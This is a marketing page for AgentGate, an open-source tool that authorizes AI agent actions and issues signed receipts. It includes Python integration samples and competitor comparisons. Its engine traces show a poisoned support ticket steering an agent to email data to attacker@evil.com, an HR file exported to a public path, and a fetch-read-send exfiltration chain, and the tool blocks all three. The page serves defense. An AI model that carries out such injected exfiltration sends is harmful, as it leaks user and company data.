Runtime authorization · open source

Every agent action, provable to someone who wasn't there.

If your agent is sitting in security review because nobody can show what it will do, this is the missing artifact. It asks before it acts and gets back a receipt — who authorized this, what exactly, under what information flow — and your reviewer checks it themselves, offline, with a public key and no access to your systems.

verification
Ed25519, offline, public key — the holder cannot forge one
on the wire
130 ms median to authorize, 0 ms to check the binding
integration
One decorator. Python and TypeScript, MIT licensed.
receipt · 3ebe7a0cBinding mismatch
decision
PERMIT
agent
pay_bot
action
transfer · /payments/outbound
EUR
authorizedcomputing…
about to runcomputing…

Refused. The receipt does not authorize this operation. Signed by key ebdf1d012508e7ae for a different one — no signature covers what you just typed.

Nothing here is recorded or simulated. The digest is recomputed in your browser with the same SHA-256 and the same canonicalization the server uses.

What it refuses

A policy engine asks whether an action may run.

What stops exfiltration is whether this data may reach this destination. Every line below is transcribed from the engine, not written for the page.

A poisoned ticket cannot re-address the reply

prompt injection
read    /tickets/8842.txt        PERMIT    integrity -> UNTRUSTED        session now carries content the agent did not authorsend    /outbox/reply.txt   to customer@ourcompany.com        PERMIT    destination was declared at registrationsend    /outbox/reply.txt   to attacker@evil.com        DENY      FLOW_VIOLATION:INTEGRITY:UNDECLARED_DESTINATION        this send is addressed to 'attacker@evil.com', which the agent        never declared, and its session carries content it did not author
Once a session carries content the agent did not author, the agent no longer chooses where data goes. Only destinations declared before that content arrived still count. Refusing every send instead would be simpler and useless — reading a ticket and replying to it is what a support agent is for.

Payroll does not leave through a public path

read    /hr/salary_2026.xlsx        PERMIT    watermark -> SECRETexport  /public/summary.pdf        DENY      SECRET_TO_PUBLIC
Reading raises what the session has been exposed to. Sending spends it, and what leaves must not outrank where it goes.

Three harmless steps are still an exfiltration

fetch   https://feed.example.com/itemsread    /hr/employees.csvsend    /webhooks/notify        DENY      KILL_CHAIN:LETHAL_TRIFECTA
External read, sensitive access, outbound channel. Each is ordinary. All three in one session is the pipeline, whatever the individual verdicts said.

If this is where you are

Your agent works. It has been in security review for six weeks.

The engineering is done. What is not done is the part where someone has to sign that this thing can touch production data, and they cannot sign it because nobody can show them what the agent will do — or prove what it did.

That is not a technology gap. Enforcement exists, and most of it is free. It is an evidence gap: 67% of organizations running agents have no audit trail their own reviewers would accept, and the agent stays blocked while the quarter it was meant to affect goes by.

01

Your agent, instrumented

Every consequential action it takes goes through authorization and comes back with a receipt. We do the integration with your team, on your agent, not a sample one.

02

The evidence pack

A session of your agent working, every decision sealed, and the verifier your reviewer runs themselves. They check it offline with a public key and no access to your systems.

03

The written answer

What the agent may do, what it may never do, what happens when it is compromised, and how each of those is enforced rather than promised. In the form a review committee accepts.

Tell us what is blocking you

We are taking a small number of these while the product is early. Scope and terms on the call — we would rather understand your review first than quote you a package you do not need.

Integrating

One decorator, and every argument is bound.

On each call it authorizes with the full operation, recomputes the digest locally before dispatch, spends the receipt, then runs the body. If anything changed in between, the body does not run.

Binding every argument is the default because the alternative is the bug. A transfer(account, amount, recipient) guarded only on account authorizes any amount to anyone — the confused-deputy gap that arXiv 2606.28679 pins on LangChain, LlamaIndex and the Stripe Agent Toolkit.

frameworks
LangChain · LangGraph · AutoGen · OpenAI Agents · Vercel AI SDK
the cost
Every consequential tool call goes through the decorator. That is real work, and the honest number.
payments/transfer.py
from agentgate import AgentGate gate = AgentGate("https://pdp.internal", api_key=KEY)gate.register(    agent_id="pay_bot",    declared_purpose="Pay approved suppliers",    authorized_resources=["/payments/*"],    authorized_actions=["transfer"],    allowed_destinations=["/payments/*"],) @gate.guard("transfer", resource_arg="account")def transfer(account: str, amount_minor: int, recipient: str):    ...

Where this sits

You are probably also looking at three other things.

They are good, they are well funded, and they solve different problems. AgentGate composes with them rather than replacing them — it takes a decision, from us or from anyone, and turns it into something a third party can check.

layerwhoanswerswhat it leaves open
Inventory and postureCyera · Noma · ZenityWhich agents exist, what they can reach, what looks risky.Discovers and classifies. Does not stop an action.
Agent identityOkta · Entra Agent ID · CyberArkWho this agent is and what credentials it holds.Says nothing about what the agent does with that identity.
GatewaysRunlayer · Obot · MintMCPWhether this tool may be called at all.Gates the tool, never the argument values passed to it.
Pre-action policyAPort / OAP · Permit.ioWhether this action may execute, against declared policy.Decides. Nothing binds the decision to what actually ran.
EvidenceAgentGateWhether the data may reach this destination — and what was authorized, provably.Session-grained flow, not value-grained. Stated in full on the how-it-works page.

Every row above produces a log. None of them produces an artifact your auditor can verify without trusting the vendor that wrote it. That is the row we are in.

Why now is not a forecast

The obligation is already in force.

Article 12 of the EU AI Act applied from 2 August 2026: automatic recording of events across the lifecycle, and under Article 26 the deployer keeps those logs for at least six months. Up to €15M or 3% of worldwide turnover.

12%

of IT leaders say they can actually govern the agents they have deployed, against 51% who have agents in production.

OutSystems, 1,900 respondents

40%

of enterprises will demote or decommission an autonomous agent by 2027 over governance gaps found after an incident.

Gartner

6 months

minimum retention on the deployer, and a log written after the fact by the system being questioned is not what an auditor is asking for.

EU AI Act, Article 26

Insurers arrived at the same requirement from the other side. AIUC-1 now operates as a managing general agent with Beazley paper, and what they ask for is proof, at claim time, that you did what you said you did. A receipt sealed before the action answers that. A log assembled afterwards does not.

Read by people building the same thing

No customer logos yet. This is what we have instead.

We are studying AgentGate closely — the Merkle-chained artifact approach is a compelling pattern for high-stakes agent actions.
Kirill (Fenix)author, ATAP — the open agent trust protocol

ATAP shipped v0.3.1 and then v0.3.2 in the same discussion thread, folding in the pre-execution sealing approach.

The pre-execution evidence framing is interesting — especially the distinction between authorization evidence that exists before consequence versus audit logs assembled afterward.
Dale Chouagent governance researcher

Works with your existing stack

Drop-in integration. No framework changes. No rewrites.

Python 3.10+TypeScript / Node.jsLangChainLangGraphAutoGenMCP
billing_agent.py
from agentgate import AgentGate gate = AgentGate("https://agentgate.internal", api_key=API_KEY)gate.register(    "billing-agent",    "Billing agent",    "Settle approved supplier invoices",    authorized_resources=["/payments/*"],    authorized_actions=["transfer"],    # Declared before any content arrives, which is what makes it mean    # something: a session carrying material the agent did not author    # does not get to choose where data goes.    allowed_destinations=["acct_9931", "acct_4402"],) # Every argument is bound into the authorization, so the receipt covers# this amount to this recipient - not "a transfer". Authorize, check the# binding at dispatch, redeem the receipt, then run.@gate.guard("transfer", resource_arg="account")def transfer(account: str, amount_minor: int, recipient: str):    return payments.create(account, amount_minor, recipient) transfer("/payments/outbound", 25_000, "acct_9931")